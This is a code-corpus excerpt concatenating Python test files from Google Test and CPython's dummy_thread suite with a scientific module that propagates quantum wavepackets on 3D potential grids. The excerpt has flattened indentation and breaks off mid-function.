TestFlag('death_test_use_fork', '1', '0')
TestFlag('stack_trace_depth', '0', '100')
if __name__ == '__main__':
gtest_test_utils.Main()
| bsd-3-clause | -2,378,697,841,585,359,000 | 32.854369 | 79 | 0.708632 | false |
mancoast/CPythonPyc_test | cpython/253_test_dummy_thread.py | 70 | 7192 | """Generic thread tests.
Meant to be used by dummy_thread and thread. To allow for different modules
to be used, test_main() can be called with the module to use as the thread
implementation as its sole argument.
"""
import dummy_thread as _thread
import time
import Queue
import random
import unittest
from test import test_support
DELAY = 0 # Set > 0 when testing a module other than dummy_thread, such as
# the 'thread' module.
class LockTests(unittest.TestCase):
"""Test lock objects."""
def setUp(self):
# Create a lock
self.lock = _thread.allocate_lock()
def test_initlock(self):
#Make sure locks start locked
self.failUnless(not self.lock.locked(),
"Lock object is not initialized unlocked.")
def test_release(self):
# Test self.lock.release()
self.lock.acquire()
self.lock.release()
self.failUnless(not self.lock.locked(),
"Lock object did not release properly.")
def test_improper_release(self):
#Make sure release of an unlocked thread raises _thread.error
self.failUnlessRaises(_thread.error, self.lock.release)
def test_cond_acquire_success(self):
#Make sure the conditional acquiring of the lock works.
self.failUnless(self.lock.acquire(0),
"Conditional acquiring of the lock failed.")
def test_cond_acquire_fail(self):
#Test acquiring locked lock returns False
self.lock.acquire(0)
self.failUnless(not self.lock.acquire(0),
"Conditional acquiring of a locked lock incorrectly "
"succeeded.")
def test_uncond_acquire_success(self):
#Make sure unconditional acquiring of a lock works.
self.lock.acquire()
self.failUnless(self.lock.locked(),
"Uncondional locking failed.")
def test_uncond_acquire_return_val(self):
#Make sure that an unconditional locking returns True.
self.failUnless(self.lock.acquire(1) is True,
"Unconditional locking did not return True.")
self.failUnless(self.lock.acquire() is True)
def test_uncond_acquire_blocking(self):
#Make sure that unconditional acquiring of a locked lock blocks.
def delay_unlock(to_unlock, delay):
"""Hold on to lock for a set amount of time before unlocking."""
time.sleep(delay)
to_unlock.release()
self.lock.acquire()
start_time = int(time.time())
_thread.start_new_thread(delay_unlock,(self.lock, DELAY))
if test_support.verbose:
print
print "*** Waiting for thread to release the lock "\
"(approx. %s sec.) ***" % DELAY
self.lock.acquire()
end_time = int(time.time())
if test_support.verbose:
print "done"
self.failUnless((end_time - start_time) >= DELAY,
"Blocking by unconditional acquiring failed.")
class MiscTests(unittest.TestCase):
"""Miscellaneous tests."""
def test_exit(self):
#Make sure _thread.exit() raises SystemExit
self.failUnlessRaises(SystemExit, _thread.exit)
def test_ident(self):
#Test sanity of _thread.get_ident()
self.failUnless(isinstance(_thread.get_ident(), int),
"_thread.get_ident() returned a non-integer")
self.failUnless(_thread.get_ident() != 0,
"_thread.get_ident() returned 0")
def test_LockType(self):
#Make sure _thread.LockType is the same type as _thread.allocate_locke()
self.failUnless(isinstance(_thread.allocate_lock(), _thread.LockType),
"_thread.LockType is not an instance of what is "
"returned by _thread.allocate_lock()")
def test_interrupt_main(self):
#Calling start_new_thread with a function that executes interrupt_main
# should raise KeyboardInterrupt upon completion.
def call_interrupt():
_thread.interrupt_main()
self.failUnlessRaises(KeyboardInterrupt, _thread.start_new_thread,
call_interrupt, tuple())
def test_interrupt_in_main(self):
# Make sure that if interrupt_main is called in main threat that
# KeyboardInterrupt is raised instantly.
self.failUnlessRaises(KeyboardInterrupt, _thread.interrupt_main)
class ThreadTests(unittest.TestCase):
"""Test thread creation."""
def test_arg_passing(self):
#Make sure that parameter passing works.
def arg_tester(queue, arg1=False, arg2=False):
"""Use to test _thread.start_new_thread() passes args properly."""
queue.put((arg1, arg2))
testing_queue = Queue.Queue(1)
_thread.start_new_thread(arg_tester, (testing_queue, True, True))
result = testing_queue.get()
self.failUnless(result[0] and result[1],
"Argument passing for thread creation using tuple failed")
_thread.start_new_thread(arg_tester, tuple(), {'queue':testing_queue,
'arg1':True, 'arg2':True})
result = testing_queue.get()
self.failUnless(result[0] and result[1],
"Argument passing for thread creation using kwargs failed")
_thread.start_new_thread(arg_tester, (testing_queue, True), {'arg2':True})
result = testing_queue.get()
self.failUnless(result[0] and result[1],
"Argument passing for thread creation using both tuple"
" and kwargs failed")
def test_multi_creation(self):
#Make sure multiple threads can be created.
def queue_mark(queue, delay):
"""Wait for ``delay`` seconds and then put something into ``queue``"""
time.sleep(delay)
queue.put(_thread.get_ident())
thread_count = 5
testing_queue = Queue.Queue(thread_count)
if test_support.verbose:
print
print "*** Testing multiple thread creation "\
"(will take approx. %s to %s sec.) ***" % (DELAY, thread_count)
for count in xrange(thread_count):
if DELAY:
local_delay = round(random.random(), 1)
else:
local_delay = 0
_thread.start_new_thread(queue_mark,
(testing_queue, local_delay))
time.sleep(DELAY)
if test_support.verbose:
print 'done'
self.failUnless(testing_queue.qsize() == thread_count,
"Not all %s threads executed properly after %s sec." %
(thread_count, DELAY))
def test_main(imported_module=None):
global _thread, DELAY
if imported_module:
_thread = imported_module
DELAY = 2
if test_support.verbose:
print
print "*** Using %s as _thread module ***" % _thread
test_support.run_unittest(LockTests, MiscTests, ThreadTests)
if __name__ == '__main__':
test_main()
| gpl-3.0 | 6,847,886,768,873,957,000 | 38.516484 | 83 | 0.596079 | false |
liam-middlebrook/yaml-cpp.new-api | test/gmock-1.7.0/gtest/test/gtest_throw_on_failure_test.py | 2917 | 5766 | #!/usr/bin/env python
#
# Copyright 2009, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Tests Google Test's throw-on-failure mode with exceptions disabled.
This script invokes gtest_throw_on_failure_test_ (a program written with
Google Test) with different environments and command line flags.
"""
__author__ = 'wan@google.com (Zhanyong Wan)'
import os
import gtest_test_utils
# Constants.
# The command line flag for enabling/disabling the throw-on-failure mode.
THROW_ON_FAILURE = 'gtest_throw_on_failure'
# Path to the gtest_throw_on_failure_test_ program, compiled with
# exceptions disabled.
EXE_PATH = gtest_test_utils.GetTestExecutablePath(
'gtest_throw_on_failure_test_')
# Utilities.
def SetEnvVar(env_var, value):
"""Sets an environment variable to a given value; unsets it when the
given value is None.
"""
env_var = env_var.upper()
if value is not None:
os.environ[env_var] = value
elif env_var in os.environ:
del os.environ[env_var]
def Run(command):
"""Runs a command; returns True/False if its exit code is/isn't 0."""
print 'Running "%s". . .' % ' '.join(command)
p = gtest_test_utils.Subprocess(command)
return p.exited and p.exit_code == 0
# The tests. TODO(wan@google.com): refactor the class to share common
# logic with code in gtest_break_on_failure_unittest.py.
class ThrowOnFailureTest(gtest_test_utils.TestCase):
"""Tests the throw-on-failure mode."""
def RunAndVerify(self, env_var_value, flag_value, should_fail):
"""Runs gtest_throw_on_failure_test_ and verifies that it does
(or does not) exit with a non-zero code.
Args:
env_var_value: value of the GTEST_BREAK_ON_FAILURE environment
variable; None if the variable should be unset.
flag_value: value of the --gtest_break_on_failure flag;
None if the flag should not be present.
should_fail: True iff the program is expected to fail.
"""
SetEnvVar(THROW_ON_FAILURE, env_var_value)
if env_var_value is None:
env_var_value_msg = ' is not set'
else:
env_var_value_msg = '=' + env_var_value
if flag_value is None:
flag = ''
elif flag_value == '0':
flag = '--%s=0' % THROW_ON_FAILURE
else:
flag = '--%s' % THROW_ON_FAILURE
command = [EXE_PATH]
if flag:
command.append(flag)
if should_fail:
should_or_not = 'should'
else:
should_or_not = 'should not'
failed = not Run(command)
SetEnvVar(THROW_ON_FAILURE, None)
msg = ('when %s%s, an assertion failure in "%s" %s cause a non-zero '
'exit code.' %
(THROW_ON_FAILURE, env_var_value_msg, ' '.join(command),
should_or_not))
self.assert_(failed == should_fail, msg)
def testDefaultBehavior(self):
"""Tests the behavior of the default mode."""
self.RunAndVerify(env_var_value=None, flag_value=None, should_fail=False)
def testThrowOnFailureEnvVar(self):
"""Tests using the GTEST_THROW_ON_FAILURE environment variable."""
self.RunAndVerify(env_var_value='0',
flag_value=None,
should_fail=False)
self.RunAndVerify(env_var_value='1',
flag_value=None,
should_fail=True)
def testThrowOnFailureFlag(self):
"""Tests using the --gtest_throw_on_failure flag."""
self.RunAndVerify(env_var_value=None,
flag_value='0',
should_fail=False)
self.RunAndVerify(env_var_value=None,
flag_value='1',
should_fail=True)
def testThrowOnFailureFlagOverridesEnvVar(self):
"""Tests that --gtest_throw_on_failure overrides GTEST_THROW_ON_FAILURE."""
self.RunAndVerify(env_var_value='0',
flag_value='0',
should_fail=False)
self.RunAndVerify(env_var_value='0',
flag_value='1',
should_fail=True)
self.RunAndVerify(env_var_value='1',
flag_value='0',
should_fail=False)
self.RunAndVerify(env_var_value='1',
flag_value='1',
should_fail=True)
if __name__ == '__main__':
gtest_test_utils.Main()
| mit | 1,361,324,784,746,420,200 | 32.719298 | 79 | 0.656261 | false |
acuzzio/GridQuantumPropagator | src/quantumpropagator/TDPropagator.py | 1 | 30840 | ''' this is the module for the hamiltonian '''
import numpy as np
import os
import pickle
import datetime
from quantumpropagator import (printDict, printDictKeys, loadInputYAML, bring_input_to_AU,
warning, labTranformA, gaussian2, makeJustAnother2DgraphComplex,
fromHartreetoCmMin1, makeJustAnother2DgraphMULTI,derivative3d,rk4Ene3d,derivative1dPhi,
good, asyncFun, derivative1dGam, create_enumerated_folder, fromCmMin1toFs,
makeJustAnother2DgraphComplexALLS, derivative2dGamThe, retrieve_hdf5_data,
writeH5file, writeH5fileDict, heatMap2dWavefunction, abs2, fromHartoEv,
makeJustAnother2DgraphComplexSINGLE, fromLabelsToFloats, derivative2dGamTheMu,
graphic_Pulse,derivative3dMu,equilibriumIndex, readWholeH5toDict, err)
from quantumpropagator.CPropagator import (CextractEnergy3dMu, Cderivative3dMu, Cenergy_2d_GamThe,
Cderivative_2d_GamThe,Cenergy_1D_Phi, Cderivative_1D_Phi,
Cenergy_1D_Gam, Cderivative_1D_Gam, Cenergy_1D_The,
Cderivative_1D_The,Crk4Ene3d, version_Cpropagator, pulZe,
Cderivative3dMu_reverse_time)
def calculate_stuffs_on_WF(single_wf, inp, outputFile):
'''
This function is a standalone function that recreates the output file counting also the absorbing potential
'''
counter = 0
nstates = inp['nstates']
ii = 0
wf = single_wf['WF']
t_fs,t = single_wf['Time']
kind = inp['kind']
if kind != '3d':
err('This function is implemented only in 3d code')
CEnergy, Cpropagator = select_propagator(kind)
kin, pot, pul, absS = CEnergy(t,wf,inp)
kinetic = np.vdot(wf,kin)
potential = np.vdot(wf,pot)
pulse_interaction = np.vdot(wf,pul)
absorbing_potential = np.vdot(wf,absS)
absorbing_potential_thing = np.real(-2j * absorbing_potential)
total = kinetic + potential + pulse_interaction
initialTotal = inp['initialTotal']
norm_wf = np.linalg.norm(wf)
outputStringS = ' {:04d} |{:10d} |{:11.4f} | {:+e} | {:+7.5e} | {:+7.5e} | {:+7.5e} | {:+7.5e} | {:+7.5e} | {:+10.3e} | {:+10.3e} | {:+10.3e} | {:+10.3e} |'
outputString = outputStringS.format(counter, ii,t*0.02418884,1-norm_wf,fromHartoEv(kinetic.real),fromHartoEv(potential.real),fromHartoEv(total.real),fromHartoEv(initialTotal - total.real), fromHartoEv(pulse_interaction.real), pulZe(t,inp['pulseX']), pulZe(t,inp['pulseY']), pulZe(t,inp['pulseZ']), absorbing_potential_thing)
print(outputString)
kind = inp['kind']
outputStringA = "{:11.4f} {:+7.5e}".format(t,absorbing_potential_thing)
for i in range(nstates):
if kind == '3d':
singleStatewf = wf[:,:,:,i]
singleAbspote = absS[:,:,:,i]
norm_loss_this_step = np.real(-2j * np.vdot(singleStatewf,singleAbspote))
if kind == 'GamThe':
err('no 2d here')
elif kind == 'Phi' or kind == 'Gam' or kind == 'The':
err('no 1d here')
outputStringA += " {:+7.5e} ".format(norm_loss_this_step)
with open(outputFile, "a") as oof:
outputStringS2 = '{}'
outputString2 = outputStringS2.format(outputStringA)
oof.write(outputString2 + '\n')
def expandcube(inp):
return inp
def doubleAxespoins1(Y):
N = len(Y)
X = np.arange(0, 2*N, 2)
X_new = np.arange(2*N-1) # Where you want to interpolate
Y_new = np.interp(X_new, X, Y)
return(Y_new)
def doubleAxespoins(Y):
return (doubleAxespoins1(doubleAxespoins1(Y)))
def select_propagator(kind):
'''
This function will return correct function name for the propagators
kind :: String <- the kind of dynamics
'''
Propagators = {'3d' : (CextractEnergy3dMu, Cderivative3dMu),
'GamThe' : (Cenergy_2d_GamThe,Cderivative_2d_GamThe),
'Phi' : (Cenergy_1D_Phi, Cderivative_1D_Phi),
'Gam' : (Cenergy_1D_Gam, Cderivative_1D_Gam),
'The' : (Cenergy_1D_The, Cderivative_1D_The),
}
return Propagators[kind]
def propagate3D(dataDict, inputDict):
'''
Two dictionaries, one from data file and one from input file
it starts and run the 3d propagation of the wavefunction...
'''
printDict(inputDict)
printDictKeys(dataDict)
printDictKeys(inputDict)
#startState = inputDict['states']
_, _, _, nstates = dataDict['potCube'].shape
phiL, gamL, theL, natoms, _ = dataDict['geoCUBE'].shape
# INITIAL WF default values
if 'factor' in inputDict:
factor = inputDict['factor']
warning('WF widened using factor: {}'.format(factor))
else:
factor = 1
if 'displ' in inputDict:
displ = inputDict['displ']
else:
displ = (0,0,0)
if 'init_mom' in inputDict:
init_mom = inputDict['init_mom']
else:
init_mom = (0,0,0)
if 'initial_state' in inputDict:
initial_state = inputDict['initial_state']
warning('Initial gaussian wavepacket in state {}'.format(initial_state))
else:
initial_state = 0
wf = np.zeros((phiL, gamL, theL, nstates), dtype=complex)
print(initial_state)
wf[:,:,:,initial_state] = initialCondition3d(wf[:,:,:,initial_state],dataDict,factor,displ,init_mom)
# Take values array from labels (radians already)
phis,gams,thes = fromLabelsToFloats(dataDict)
# take step
dphi = phis[0] - phis[1]
dgam = gams[0] - gams[1]
dthe = thes[0] - thes[1]
inp = { 'dt' : inputDict['dt'],
'fullTime' : inputDict['fullTime'],
'phiL' : phiL,
'gamL' : gamL,
'theL' : theL,
'natoms' : natoms,
'phis' : phis,
'gams' : gams,
'thes' : thes,
'dphi' : dphi,
'dgam' : dgam,
'dthe' : dthe,
'potCube' : dataDict['potCube'],
'kinCube' : dataDict['kinCube'],
'dipCube' : dataDict['dipCUBE'],
'nacCube' : dataDict['smoCube'],
'pulseX' : inputDict['pulseX'],
'pulseY' : inputDict['pulseY'],
'pulseZ' : inputDict['pulseZ'],
'nstates' : nstates,
'kind' : inputDict['kind'],
}
#########################################
# Here the cube expansion/interpolation #
#########################################
inp = expandcube(inp)
########################################
# Potentials to Zero and normalization #
########################################
inp['potCube'] = dataDict['potCube'] - np.amin(dataDict['potCube'])
norm_wf = np.linalg.norm(wf)
good('starting NORM deviation : {}'.format(1-norm_wf))
# magnify the potcube
if 'enePot' in inputDict:
enePot = inputDict['enePot']
inp['potCube'] = inp['potCube'] * enePot
if enePot == 0:
warning('This simulation is done with zero Potential energy')
elif enePot == 1:
good('Simulation done with original Potential energy')
else:
warning('The potential energy has been magnified {} times'.format(enePot))
# constant the kinCube
kinK = False
if kinK:
kokoko = 1000
inp['kinCube'] = inp['kinCube']*kokoko
warning('kincube divided by {}'.format(kokoko))
if 'multiply_nac' in inputDict:
# this keyword can be used to multiply NACs. It works with a float or a list of triplet
# multiply_nac : 10 -> will multiply all by 10
# multiply_nac : [[1,2,10.0],[3,4,5.0]] -> will multiply 1,2 by 10 and 3,4 by 5
nac_multiplier = inputDict['multiply_nac']
if type(nac_multiplier) == int or type(nac_multiplier) == float:
warning('all Nacs are multiplied by {}'.format(nac_multiplier))
inp['nacCube'] = inp['nacCube'] * nac_multiplier
if type(nac_multiplier) == list:
warning('There is a list of nac multiplications, check input')
for state_one, state_two, multiply_factor in nac_multiplier:
inp['nacCube'][:,:,:,state_one,state_two,:] = inp['nacCube'][:,:,:,state_one,state_two,:]*multiply_factor
inp['nacCube'][:,:,:,state_two,state_one,:] = inp['nacCube'][:,:,:,state_two,state_one,:]*multiply_factor
warning('NACS corresponding of state {} and state {} are multiplied by {}'.format(state_one, state_two, multiply_factor))
inp['Nac_multiplier'] = nac_multiplier
nameRoot = create_enumerated_folder(inputDict['outFol'])
inputDict['outFol'] = nameRoot
inp['outFol'] = nameRoot
numStates = inputDict['states']
###################
# Absorbing Thing #
###################
if 'absorb' in inputDict:
good('ABSORBING POTENTIAL is taken from file')
file_absorb = inputDict['absorb']
print('{}'.format(file_absorb))
inp['absorb'] = retrieve_hdf5_data(file_absorb,'absorb')
else:
good('NO ABSORBING POTENTIAL')
inp['absorb'] = np.zeros_like(inp['potCube'])
################
# slice states #
################
kind = inp['kind']
# Take equilibrium points from directionFile
# warning('This is a bad equilibriumfinder')
# gsm_phi_ind, gsm_gam_ind, gsm_the_ind = equilibriumIndex(inputDict['directions1'],dataDict)
gsm_phi_ind, gsm_gam_ind, gsm_the_ind = (29,28,55)
warning('You inserted equilibrium points by hand: {} {} {}'.format(gsm_phi_ind, gsm_gam_ind, gsm_the_ind))
inp['nstates'] = numStates
if kind == '3d':
inp['potCube'] = inp['potCube'][:,:,:,:numStates]
inp['kinCube'] = inp['kinCube'][:,:,:]
inp['dipCube'] = inp['dipCube'][:,:,:,:,:numStates,:numStates]
wf = wf[:,:,:,:numStates]
good('Propagation in 3D.')
print('\nDimensions:\nPhi: {}\nGam: {}\nThet: {}\nNstates: {}\nNatoms: {}\n'.format(phiL, gamL, theL,numStates, natoms))
elif kind == 'GamThe':
inp['potCube'] = inp['potCube'][gsm_phi_ind,:,:,:numStates]
inp['kinCube'] = inp['kinCube'][gsm_phi_ind,:,:]
inp['dipCube'] = inp['dipCube'][gsm_phi_ind,:,:,:,:numStates,:numStates]
wf = wf[gsm_phi_ind,:,:,:numStates]
good('Propagation in GAM-THE with Phi {}'.format(gsm_phi_ind))
print('Shapes: P:{} K:{} W:{} D:{}'.format(inp['potCube'].shape, inp['kinCube'].shape, wf.shape, inp['dipCube'].shape))
print('\nDimensions:\nGam: {}\nThe: {}\nNstates: {}\nNatoms: {}\n'.format(gamL, theL, numStates, natoms))
norm_wf = np.linalg.norm(wf)
wf = wf / norm_wf
elif kind == 'Phi':
inp['potCube'] = inp['potCube'][:,gsm_gam_ind,gsm_the_ind,:numStates]
inp['kinCube'] = inp['kinCube'][:,gsm_gam_ind,gsm_the_ind]
inp['dipCube'] = inp['dipCube'][:,gsm_gam_ind,gsm_the_ind,:,:numStates,:numStates]
wf = wf[:,gsm_gam_ind,gsm_the_ind,:numStates]
good('Propagation in PHI with Gam {} and The {}'.format(gsm_gam_ind,gsm_the_ind))
print('Shapes: P:{} K:{} W:{} D:{}'.format(inp['potCube'].shape, inp['kinCube'].shape, wf.shape, inp['dipCube'].shape))
print('\nDimensions:\nPhi: {}\nNstates: {}\nNatoms: {}\n'.format(phiL, numStates, natoms))
norm_wf = np.linalg.norm(wf)
wf = wf / norm_wf
elif kind == 'Gam':
inp['potCube'] = inp['potCube'][gsm_phi_ind,:,gsm_the_ind,:numStates]
inp['kinCube'] = inp['kinCube'][gsm_phi_ind,:,gsm_the_ind]
inp['dipCube'] = inp['dipCube'][gsm_phi_ind,:,gsm_the_ind,:,:numStates,:numStates]
wf = wf[gsm_phi_ind,:,gsm_the_ind,:numStates]
good('Propagation in GAM with Phi {} and The {}'.format(gsm_phi_ind,gsm_the_ind))
print('Shapes: P:{} K:{} W:{} D:{}'.format(inp['potCube'].shape, inp['kinCube'].shape, wf.shape, inp['dipCube'].shape))
print('\nDimensions:\nGam: {}\nNstates: {}\nNatoms: {}\n'.format(gamL, numStates, natoms))
norm_wf = np.linalg.norm(wf)
wf = wf / norm_wf
elif kind == 'The':
sposta = False
if sposta:
gsm_phi_ind = 20
gsm_gam_ind = 20
warning('Phi is {}, NOT EQUILIBRIUM'.format(gsm_phi_ind))
warning('Gam is {}, NOT EQUILIBRIUM'.format(gsm_gam_ind))
inp['potCube'] = inp['potCube'][gsm_phi_ind,gsm_gam_ind,:,:numStates]
inp['absorb'] = inp['absorb'][gsm_phi_ind,gsm_gam_ind,:,:numStates]
inp['kinCube'] = inp['kinCube'][gsm_phi_ind,gsm_gam_ind,:]
inp['dipCube'] = inp['dipCube'][gsm_phi_ind,gsm_gam_ind,:,:,:numStates,:numStates]
inp['nacCube'] = inp['nacCube'][gsm_phi_ind,gsm_gam_ind,:,:numStates,:numStates,:]
wf = wf[gsm_phi_ind,gsm_gam_ind,:,:numStates]
# doubleGridPoints
doubleThis = False
if doubleThis:
warning('POINTS DOUBLED ALONG THETA')
inp['thes'] = doubleAxespoins(inp['thes'])
inp['theL'] = inp['thes'].size
inp['dthe'] = inp['thes'][0] - inp['thes'][1]
inp['potCube'] = np.array([doubleAxespoins(x) for x in inp['potCube'].T]).T
newWf = np.empty((inp['theL'],numStates), dtype=complex)
for ssssss in range(numStates):
newWf[:,ssssss] = doubleAxespoins(wf[:,ssssss])
wf = newWf
newNac = np.empty((inp['theL'],numStates,numStates,3))
for nnn in range(2):
for mmm in range(2):
for aaa in range(3):
newNac[:,nnn,mmm,aaa] = doubleAxespoins(inp['nacCube'][:,nnn,mmm,aaa])
inp['nacCube'] = newNac
newKin = np.empty((inp['theL'],9,3))
for nnn in range(9):
for mmm in range(3):
newKin[:,nnn,mmm] = doubleAxespoins(inp['kinCube'][:,nnn,mmm])
inp['kinCube'] = newKin
good('Propagation in THE with Phi {} and Gam {}'.format(gsm_phi_ind,gsm_gam_ind))
print('Shapes: P:{} K:{} W:{} D:{}'.format(inp['potCube'].shape, inp['kinCube'].shape, wf.shape, inp['dipCube'].shape))
print('\nDimensions:\nThe: {}\nNstates: {}\nNatoms: {}\n'.format(theL, numStates, natoms))
norm_wf = np.linalg.norm(wf)
wf = wf / norm_wf
else:
err('I do not recognize the kind')
initial_time_simulation = 0.0
# take a wf from file (and not from initial condition)
if 'initialFile' in inputDict:
warning('we are taking initial wf from file')
wffn = inputDict['initialFile']
print('File -> {}'.format(wffn))
wf_not_norm = retrieve_hdf5_data(wffn,'WF')
initial_time_simulation = retrieve_hdf5_data(wffn,'Time')[1] # in hartree
#wf = wf_not_norm/np.linalg.norm(wf_not_norm)
wf = wf_not_norm
#############################
# PROPAGATOR SELECTION HERE #
#############################
CEnergy, Cpropagator = select_propagator(kind)
good('Cpropagator version: {}'.format(version_Cpropagator()))
# INITIAL DYNAMICS VALUES
dt = inp['dt']
if 'reverse_time' in inputDict:
warning('Time is reversed !!')
dt = -dt
Cpropagator = Cderivative3dMu_reverse_time
t = initial_time_simulation
counter = 0
fulltime = inp['fullTime']
fulltimeSteps = int(fulltime/abs(dt))
deltasGraph = inputDict['deltasGraph']
print('I will do {} steps.\n'.format(fulltimeSteps))
outputFile = os.path.join(nameRoot, 'output')
outputFileP = os.path.join(nameRoot, 'outputPopul')
outputFileA = os.path.join(nameRoot, 'Output_Abs')
print('\ntail -f {}\n'.format(outputFileP))
if inputDict['readme']:
outputFilereadme = os.path.join(nameRoot, 'README')
with open(outputFilereadme, "w") as oofRR:
oofRR.write(inputDict['readme'])
print('file readme written')
# calculating initial total/potential/kinetic
kin, pot, pul, absS = CEnergy(t,wf,inp)
kinetic = np.vdot(wf,kin)
potential = np.vdot(wf,pot)
pulse_interaction = np.vdot(wf,pul)
initialTotal = kinetic + potential + pulse_interaction
inp['initialTotal'] = initialTotal.real
# to give the graph a nice range
inp['vmax_value'] = abs2(wf).max()
# graph the pulse
graphic_Pulse(inp)
# saving input data in h5 file
dataH5filename = os.path.join(nameRoot, 'allInput.h5')
writeH5fileDict(dataH5filename,inp)
# print top of table
header = ' Coun | step N | fs | NORM devia. | Kin. Energy | Pot. Energy | Total Energy | Tot devia. | Pulse_Inter. | Pulse X | Pulse Y | Pulse Z | Norm Loss |'
bar = ('-' * (len(header)))
print('Energies in ElectronVolt \n{}\n{}\n{}'.format(bar,header,bar))
for ii in range(fulltimeSteps):
if (ii % deltasGraph) == 0 or ii==fulltimeSteps-1:
# async is awesome. But it is not needed in 1d and maybe in 2d.
if kind == '3D':
asyncFun(doAsyncStuffs,wf,t,ii,inp,inputDict,counter,outputFile,outputFileP,outputFileA,CEnergy)
else:
doAsyncStuffs(wf,t,ii,inp,inputDict,counter,outputFile,outputFileP,outputFileA,CEnergy)
counter += 1
wf = Crk4Ene3d(Cpropagator,t,wf,inp)
t = t + dt
def restart_propagation(inp,inputDict):
'''
This function restarts a propagation that has been stopped
'''
import glob
nameRoot = inputDict['outFol']
list_wave_h5 = sorted(glob.glob(nameRoot + '/Gaussian*.h5'))
last_wave_h5 = list_wave_h5[-1]
wf = retrieve_hdf5_data(last_wave_h5,'WF')
t = retrieve_hdf5_data(last_wave_h5,'Time')[1] # [1] is atomic units
kind = inp['kind']
deltasGraph = inputDict['deltasGraph']
counter = len(list_wave_h5) - 1
dt = inputDict['dt']
fulltime = inputDict['fullTime']
fulltimeSteps = int(fulltime/dt)
outputFile = os.path.join(nameRoot, 'output')
outputFileP = os.path.join(nameRoot, 'outputPopul')
outputFileA = os.path.join(nameRoot, 'Output_Abs')
if (inputDict['fullTime'] == inp['fullTime']):
good('Safe restart with same fulltime')
#h5_data_file = os.path.join(nameRoot,'allInput.h5')
else:
h5_data_file = os.path.join(nameRoot,'allInput.h5')
dict_all_data = readWholeH5toDict(h5_data_file)
dict_all_data['fullTime'] = inputDict['fullTime']
writeH5fileDict(h5_data_file, dict_all_data)
good('different fullTime detected and allInput updated')
print('\ntail -f {}\n'.format(outputFileP))
CEnergy, Cpropagator = select_propagator(kind)
good('Cpropagator version: {}'.format(version_Cpropagator()))
ii_initial = counter * deltasGraph
print('I will do {} more steps.\n'.format(fulltimeSteps-ii_initial))
if True:
print('Calculation restart forced on me... I assume you did everything you need')
else:
warning('Did you restart this from a finished calculation?')
strout = "rm {}\nsed -i '$ d' {}\nsed -i '$ d' {}\n"
print(strout.format(last_wave_h5,outputFile,outputFileP))
input("Press Enter to continue...")
strOUT = '{} {} {}'.format(ii_initial,counter,fulltimeSteps)
good(strOUT)
for ii in range(ii_initial,fulltimeSteps):
#print('ii = {}'.format(ii))
if ((ii % deltasGraph) == 0 or ii==fulltimeSteps-1):
# async is awesome. But it is not needed in 1d and maybe in 2d.
if kind == '3D':
asyncFun(doAsyncStuffs,wf,t,ii,inp,inputDict,counter,outputFile,outputFileP,outputFileA,CEnergy)
else:
doAsyncStuffs(wf,t,ii,inp,inputDict,counter,outputFile,outputFileP,outputFileA,CEnergy)
counter += 1
wf = Crk4Ene3d(Cpropagator,t,wf,inp)
t = t + dt
def doAsyncStuffs(wf,t,ii,inp,inputDict,counter,outputFile,outputFileP,outputFileA,CEnergy):
nameRoot = inputDict['outFol']
nstates = inp['nstates']
name = os.path.join(nameRoot, 'Gaussian' + '{:04}'.format(counter))
h5name = name + ".h5"
writeH5file(h5name,[("WF", wf),("Time", [t*0.02418884,t])])
time1 = datetime.datetime.now()
kin, pot, pul, absS = CEnergy(t,wf,inp)
time2 = datetime.datetime.now()
#print(time2-time1)
kinetic = np.vdot(wf,kin)
potential = np.vdot(wf,pot)
pulse_interaction = np.vdot(wf,pul)
absorbing_potential = np.vdot(wf,absS)
#print(absorbing_potential)
# you asked and discussed with Stephan about it. This is the norm loss due to CAP complex absorbing potential. It needs to be multiplied by -2i.
absorbing_potential_thing = np.real(-2j * absorbing_potential)
#print(absorbing_potential_thing)
total = kinetic + potential + pulse_interaction
initialTotal = inp['initialTotal']
norm_wf = np.linalg.norm(wf)
## you wanted to print the header when the table goes off screen... this is why you get the rows number
#rows, _ = os.popen('stty size', 'r').read().split()
#if int(rows) // counter == 0:
# print('zero')
outputStringS = ' {:04d} |{:10d} |{:11.4f} | {:+e} | {:+7.5e} | {:+7.5e} | {:+7.5e} | {:+7.5e} | {:+7.5e} | {:+10.3e} | {:+10.3e} | {:+10.3e} | {:+10.3e} |'
outputString = outputStringS.format(counter,
ii,
t*0.02418884,
1-norm_wf,
fromHartoEv(kinetic.real),
fromHartoEv(potential.real),
fromHartoEv(total.real),
fromHartoEv(initialTotal - total.real),
fromHartoEv(pulse_interaction.real),
pulZe(t,inp['pulseX']),
pulZe(t,inp['pulseY']),
pulZe(t,inp['pulseZ']),
absorbing_potential_thing)
print(outputString)
kind = inp['kind']
outputStringSP = "{:11.4f}".format(t/41.3)
outputStringA = "{:11.4f} {:+7.5e}".format(t,absorbing_potential_thing)
for i in range(nstates):
if kind == '3d':
singleStatewf = wf[:,:,:,i]
singleAbspote = absS[:,:,:,i]
norm_loss_this_step = np.real(-2j * np.vdot(singleStatewf,singleAbspote))
if kind == 'GamThe':
singleStatewf = wf[:,:,i]
